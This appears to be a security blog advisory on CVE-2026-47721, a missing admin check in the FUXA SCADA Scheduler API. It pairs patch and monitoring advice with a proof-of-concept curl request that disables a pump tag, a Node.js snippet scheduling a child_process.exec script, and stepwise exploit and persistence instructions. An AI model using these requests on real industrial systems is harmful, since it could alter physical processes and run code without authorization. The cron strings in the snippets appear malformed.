Listen to this Post
How the CVE Works
CVE-2026-47721 is an authorization bypass in the FUXA Scheduler API that allows authenticated non-admin users to create or modify scheduled actions which should be restricted to administrators only.
The vulnerability exists because the Scheduler API endpoints (POST /api/scheduler and DELETE /api/scheduler) failed to properly enforce administrator‑level permission checks. Specifically, when processing scheduler modifications, the API did not verify that the requesting user had the necessary admin rights, such as authJwt.haveAdminPermission(permission).
As a result, an authenticated user with a non‑administrative role (e.g., “operator”) could schedule privileged operations that are normally reserved for administrators. These operations include changing device values (e.g., writing to PLC tags) and executing server‑side scripts.
In a typical SCADA deployment, the ability to write to devices and run automation scripts is a high‑impact capability that can alter setpoints, open safety interlocks, or execute arbitrary code on the server. By exploiting this flaw, an attacker can create a scheduled job that, for example, rewrites a pump’s enable tag or runs a project script that traverses the device tree.
Because the attack is scheduled, it does not require the attacker to maintain an active session. Furthermore, a repeating schedule will re‑apply the malicious changes every cycle, even if an administrator manually reverts them.
The issue is rooted in CWE‑862 (Missing Authorization) and carries a CVSS 3.1 score of 6.3 (Medium) with the vector AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L. The fix was released in version 1.3.2, where the developers added explicit admin permission checks to both the POST and DELETE handlers, bringing them in line with other write‑endpoints that reach `runtime.devices.setTagValue` or runtime.scriptsMgr.runScript.
As a defence‑in‑depth measure, the scheduler service should also validate each `deviceActions` entry against the creator’s stored groups before execution (e.g., reject any `onRunScript` action if the author is not an admin at execution time).
The vulnerability was discovered by aisafe.io.
DailyCVE Form
Platform: FUXA
Version: 1.3.1
Vulnerability: Missing Authorization
Severity: Medium (6.3)
date: 2026‑06‑08
Prediction: 2026‑07‑01
What Undercode Say
Check if the target FUXA instance is vulnerable to CVE-2026-47721
curl -X POST http://target-fuxa/api/scheduler \
-H "Authorization: Bearer <non-admin_jwt>" \
-H "Content-Type: application/json" \
-d '{
"name": "malicious_schedule",
"enabled": true,
"cron": " ",
"deviceActions": [
{
"type": "setTagValue",
"deviceId": "pump_device",
"tag": "enable",
"value": false
}
]
}'
// Node.js snippet to test missing admin check
const axios = require('axios');
async function exploitScheduler(targetUrl, token) {
const payload = {
name: "exploit_cron",
enabled: true,
cron: "/5 ",
deviceActions: [
{
type: "runScript",
script: "require('child_process').exec('whoami > /tmp/pwned')"
}
]
};
try {
await axios.post(<code>${targetUrl}/api/scheduler</code>, payload, {
headers: { Authorization: `Bearer ${token}` }
});
console.log("[+] Scheduled malicious job (admin privilege escalation)");
} catch (err) {
console.error("[!] Exploit failed – target may be patched");
}
}
Exploit
- Authenticate as a non‑admin user (e.g., operator) and obtain a valid JWT.
- Craft a JSON payload containing a scheduled action that changes a device value or runs a server‑side script.
- Send a `POST /api/scheduler` request with the payload and the non‑admin JWT. Because of the missing admin check, the scheduler accepts the request.
- Wait for the cron trigger – the scheduled action executes with full administrator privileges, altering industrial processes or executing arbitrary code.
- Persist the attack – if the schedule repeats, the malicious action reapplies automatically even after manual remediation.
Protection
- Upgrade FUXA to version 1.3.2 or later, which includes the required admin permission checks in the Scheduler API.
- Apply the fix manually if an immediate upgrade is not possible: add `authJwt.haveAdminPermission(permission)` to the `POST /api/scheduler` and `DELETE /api/scheduler` handlers (see
server/api/scheduler/index.js:102-112). - Implement additional validation in the scheduler service to verify that each `deviceActions` entry (especially
onRunScript) is only allowed if the creator is an admin at execution time. - Restrict network access to the Scheduler API endpoints to trusted IP addresses or VPN clients.
- Monitor logs for unusual scheduler creations or modifications by non‑admin users.
Impact
- Privilege Escalation: A non‑admin user (e.g., operator) can execute actions reserved for administrators, such as writing to PLC tags or running server‑side scripts.
- Unauthorized Industrial Control: An attacker can alter device states (e.g., open safety interlocks, change pump enable tags) without proper authorization, potentially causing physical damage or process disruption.
- Persistence: Scheduled jobs repeat automatically, reapplying malicious changes even after an administrator reverts them.
- Stealth: The attack does not require an active session; the scheduled action can be set to fire at a later time, making it harder to trace back to the attacker.
- CVSS Score: 6.3 (Medium) – the vulnerability is remotely exploitable with low complexity and requires low privileges, resulting in limited confidentiality, integrity, and availability impact.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
